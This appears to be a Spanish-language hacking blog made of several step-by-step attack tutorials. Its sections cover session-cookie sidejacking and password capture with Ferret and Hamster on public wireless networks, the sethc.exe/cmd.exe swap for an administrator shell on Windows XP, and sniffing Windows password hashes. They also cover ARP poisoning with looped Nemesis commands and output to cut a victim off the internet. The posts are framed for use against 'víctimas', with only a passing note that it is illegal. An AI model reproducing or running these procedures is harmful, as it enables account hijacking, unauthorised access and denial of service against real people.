Ojo: al conectarse en redes wireless (hacking correo prodigy)

ojo al conectarse en sitios publicos por medio de redes wireless podrian estar siendo vigilados

Busque en google algo al respecto y no encontre nada sobre esto, como ya les habia hablado anteriormente de 2 herramientas me refiero a hamster y ferret, que nos permite snifar (capturar) cookies y reemplazarlas contra sitios web suplantando la identidad de la victima. Pero en ningun momento sabemos la contraseña.

Pues cual fue mi sorpresa que “ferret” tambien pude capturar dichas contraseñas en este caso al abrir una cuenta de prodigy.net.mx ( una cuenta propia ) y pues podremos ahora si tener acceso completo a la cuenta de correo, y a si no depender del tiempo que este nuestra victima conectada. les pongo una captura de pantalla de ferret con el password capturado…

esto lo comprobe yo mismo con una de mis cuentas de prodigy.. 

 Cualquier duda no duden en preguntar

Hacking Windows XP (HOWTO)

Bueno como muchos sabes que windows xp es muy inseguro, ya que siempre que hacemos un analisis de nuestro sistema con nuestro antivirus favorito, cual es nuestra sorpresas que tenemos unos cuantos spywares, virus, etc. apesar de tener nuestro firewall y nustro antivirus actualizado.

Pero bueno hoy le voy a enseñar un truco que aprendi que para muchos sera de mucha ayuda.

Acceder a cualquier equipo Windows XP como ADMINISTRADOR

Aqui les dejo los pasos, la verdad son muy sencillos cualquier persona lo podria hacer que tenga conociminetos minimos de manejo de una PC.

1.- Necesitamos acceso fisico al PC

2.-Arrancar el ordenador con una distribucion Live-CD que permita lectura de discos NTFS. Un ejemplo poria ser Knoppix

http://www.solido.uji.es/knoppix.html

3.-una vez arracando con nuestra live-cd favorita, damos click  con el botón derecho a las propiedades del disco /hda1 que es el de Windows. Ahora desactiva el READ ONLY para que puedas escribir en el.

4.- hacemos clic con el botón izquierdo en el disco /hda1, entramos en la carpeta /WINDOWS/SYSTEM32, borra o renombra el fichero sethc.exe y haz una copia de cmd.exe con el nombre sethc.exe. CMD.exe también lo podemos encontrar en /WINDOWS/SYSTEM32

5.- Salimos de Knoppix

6.- reinicia windows xp

7. En la ventana de Login tenemos que darle 5 veces al SHIFT y listo ahí tienes una shell de comandos lista para hackear

Obtener la contraseña de Windows de un usuario de nuestra red local.

TEORIA:

El equipo atacante coloca un Sniffer a la escucha, de forma que es capaz de capturar todo el tráfico que pasa por su tarjeta de red. Cuando un usuario víctima inicia sesión en el equipo atacante para acceder a sus recursos compartidos, el Sniffer captura el hash desafío-respuesta intercambiado y después de crackearlo por fuerza bruta, se obtiene la contraseña de Windows del usuario víctima que inició sesión en el equipo atacante. 

 http://www.geocities.com/unrayodesoul/gospel/Practica.2.Sniffar.Password.Windows.byGospel.pdf

 

 

http://www.geocities.com/unrayodesoul/gospel/Practica.2.Sniffar.Password.Windows.byGospel.pdf

Negación de servicios de Internet a otro equipo de la red local

Aqui les dejo una practica que encontre en la red para impedir que un equipo de una red se conecte a internet.

Teoría:El equipo víctima accede a Internet a través del router. Y a su vez, accede al router pq conoce su dirección IP, q es traducida a dirección MAC a través del protocolo ARP. Por tanto, en última instancia, el equipo víctima accede a Internet mandando paquetes hacia la dirección MAC del router. Si el equipo atacante logra engañar al equipo víctima, haciendole creer q la dirección MAC del router es otra inexistente, el equipo víctima no podrá llegar al router, esto es, no podrá llegar a Internet. Para llevar esto a cabo, el equipo atacante debe enviar un paquete malicioso suplantando la identidad del router y diciéndole al equipo víctima q debe actualizar su tabla ARP con la nueva dirección MAC inexistente.

Aplicación práctica:

Envenenamiento ARP

Escenario:

Atacante: 10.10.0.69
Víctima: 10.10.0.254
Router / Puerta de Enlace: 10.10.0.33

Herramientas:

Vamos a utilizar el inyector de paquetes Némesis @ http://www.packetfactory.net/projects/nemesis/
Más información sobre Nemesis en http://foro.elhacker.net/index.php/topic,33197.0.html

Procedimiento:

1º Obtener las direcciones MACs de los equipos víctima y router a través de sus direcciones IP. Para ello, hacemos un ping a ambos equipos.

2º Obtener la tabla caché ARP de direcciones IP/MAC en el equipo atacante. Esto se hace a través del comando arp -a

Citar

C:\>arp -a

Interfaz: 10.10.0.69 — 0×2
  Dirección IP          Dirección física      Tipo
  10.10.0.33            00-c0-49-44-b1-d5     dinámico
  10.10.0.254           00-20-18-b0-06-df     dinámico

C:\>

3º Obtener la tabla caché ARP de direcciones IP/MAC en el equipo víctima. Esto es lo q supuestamente ocurriría en el equipo víctima…

Citar

C:\WINDOWS\system32>arp -a

Interfaz: 10.10.0.254 — 0×2
  Dirección IP          Dirección física      Tipo
  10.10.0.33            00-c0-49-44-b1-d5     dinámico
  10.10.0.69            00-05-1c-0a-ab-92     dinámico
 
C:\WINDOWS\system32>

4º Verificar que la víctima tiene conexión a Internet. Esto es lo q supuestamente ocurriría en el equipo víctima…

Citar

C:\WINDOWS\system32>ping www.google.es -t

Haciendo ping a www.google.akadns.net [66.102.11.99] con 32 bytes de datos:

Respuesta desde 66.102.11.99: bytes=32 tiempo=93ms TTL=241
Respuesta desde 66.102.11.99: bytes=32 tiempo=113ms TTL=237
Respuesta desde 66.102.11.99: bytes=32 tiempo=110ms TTL=237
etc.

5º Inyectar desde el atacante el paquete malicioso que envenena la tabla caché ARP de la víctima con la MAC errónea del router.

Sintaxis de la inyección: nemesis arp -D IPvictima -S IProuter -H MACrouter

Citar

C:\>nemesis arp -D 10.10.0.254 -S 10.10.0.33 -H AA:BB:CC:DD:EE:FF

ARP Packet Injected

C:\>

6º Obtener la tabla caché ARP de direcciones IP/MAC envenenada en el equipo víctima. Esto es lo q supuestamente ocurriría en el equipo víctima…

Citar

C:\WINDOWS\system32>arp -a

Interfaz: 10.10.0.254 — 0×2
  Dirección IP          Dirección física      Tipo
  10.10.0.33            aa-bb-cc-dd-ee-ff     dinámico
  10.10.0.69            00-05-1c-0a-ab-92     dinámico
 
C:\WINDOWS\system32>

7º Verificar que la víctima NO tiene conexión a Internet. Esto es lo q supuestamente ocurriría en el equipo víctima…

Citar

C:\WINDOWS\system32>ping www.google.es -t

Haciendo ping a www.google.akadns.net [66.102.11.99] con 32 bytes de datos:

Tiempo de espera agotado para esta solicitud.
Tiempo de espera agotado para esta solicitud.
Tiempo de espera agotado para esta solicitud.
Tiempo de espera agotado para esta solicitud.
Tiempo de espera agotado para esta solicitud.
Tiempo de espera agotado para esta solicitud.
Tiempo de espera agotado para esta solicitud.
Respuesta desde 66.102.11.99: bytes=32 tiempo=112ms TTL=238
etc.

Como podéis observar, después de cierto tiempo, el sistema Windows de la víctima refrescará su tabla caché ARP con la verdadera dirección MAC del router y, entonces, sí que dispondrá de conexión Internet. Se fastidió el invento?? Noooo… si estamos continua y periódicamente envenenando la tabla caché ARP de la víctima desde el equipo atacante.
Para ello, inyectamos el paquete con Nemesis desde un bucle FOR:

Citar

C:\>FOR /L %i IN (1,1,5000) DO nemesis arp -D 10.10.0.254 -S 10.10.0.33 -H AA:BB:CC:DD:EE:FF

C:\>nemesis arp -D 10.10.0.254 -S 10.10.0.33 -H AA:BB:CC:DD:EE:FF

ARP Packet Injected

C:\>nemesis arp -D 10.10.0.254 -S 10.10.0.33 -H AA:BB:CC:DD:EE:FF

ARP Packet Injected

C:\>nemesis arp -D 10.10.0.254 -S 10.10.0.33 -H AA:BB:CC:DD:EE:FF

ARP Packet Injected

C:\>nemesis arp -D 10.10.0.254 -S 10.10.0.33 -H AA:BB:CC:DD:EE:FF

ARP Packet Injected

C:\>nemesis arp -D 10.10.0.254 -S 10.10.0.33 -H AA:BB:CC:DD:EE:FF

ARP Packet Injected

etc.

De esta forma, la víctima no dispondrá de conexión a Internet mientras dure el bucle FOR del atacante…

Sidejacking con ferret y hamster

Navegando por la Red me encontre con unas aplicaciones muy curiosas (ferret y hamster). hablaremos de ellas mas abajo.

Talves muchos no sepan que significa “Sidejacking”

sidejacking es una tecnica que nos permite snifar (capturar) cookies y reemplazarlas contra sitios web suplantando la identidad de la victima.

Que quiere decir esto? en pocas palabras es que podremos hacernos pasar por cualquier usuario que haya ingresado a cualquier pagina web, sin saber sus datos de acceso. (usuario y contraseña)

dichas herramientas estan disponible en http://www.erratasec.com/sidejacking.zip

Aqui  una definicion de cada herramienta:

Ferret: es un sniffer de linea de comandos que esnifa cookies.

Hamster: este actua como cualquier proxy pero se basa en las cookies o resultados capturados por Ferret.

Aqui les dejo como hacer un ataque (cuidado que hacer esto es delito)

primero bajar las aplicaciones del enlace de arriba

crear un nuevo perfil en firefox

escribimos lo siguiente

C:\Archivos de programa\Mozilla Firefox\>set MOZ_NO_REMOTE=1

y luego

C:\Archivos de programa\Mozilla Firefox\>Firefox -p

nos saldra algo asi

y le damos en crear nuevo perfil y lo nombramos Hamster y hacemos click en finalizar. ahora le damos doble click al perfil que hemos creado para que firefox inicie con el.

En el nuevo Navegador que se nos abrirá, nos vamos a Menú Herramientas/Opciones… nos vamos a la pestaña superior “Principal” y ahí en el campo “Página de Inicio” colocamos la siguiente dirección:

nos dirigimos a la pestaña superior “Avanzado”, luego en la pestaña de “Red” seleccionamos el Botón “Configuración…” que se encuentra en el frame de Conexión, y lo configuramos de la siguiente forma:

despues de todo esto

crear un directorio en la unidad c: de la siguiente manera 

 C:\Sidejacking y descomprir dentro los archivos que bajamos

ahora veamos que interfaz de red queremos utilizar para que Ferret snife. hay que cambiarnos de directorio entonces ponemos en una consola de windows ponemos.

cd C:\Sidejacking

una ves dentro del directorio pasamos a llamar a ferret para verificar nuestras tarjetas

Ferret -W

Y vemos el numero que esta al lado de nuestra tarjeta de red. supongamos que nuestra tarjeta es en el lugar 2. como es en mi caso aqui una captura de pantalla.

entonces ponetmos ferret -i 2

con esto ya tenemos a Ferret capturando cookies que pasen por nuestra interfaz.

ahora en otra consola de windows abrirmos hamster. primero nos cambiamos de directorio

cd C:\Sidejacking

una ves dentro escribimos

hamster

luego nos vamos al navegador que configuramos

y escribimos http://Hamster

 y veremos algo como lo siguiente…

seleccionamos la ip de al lado derecho y al lado izquierdo veremos todo lo que hemos obtenido.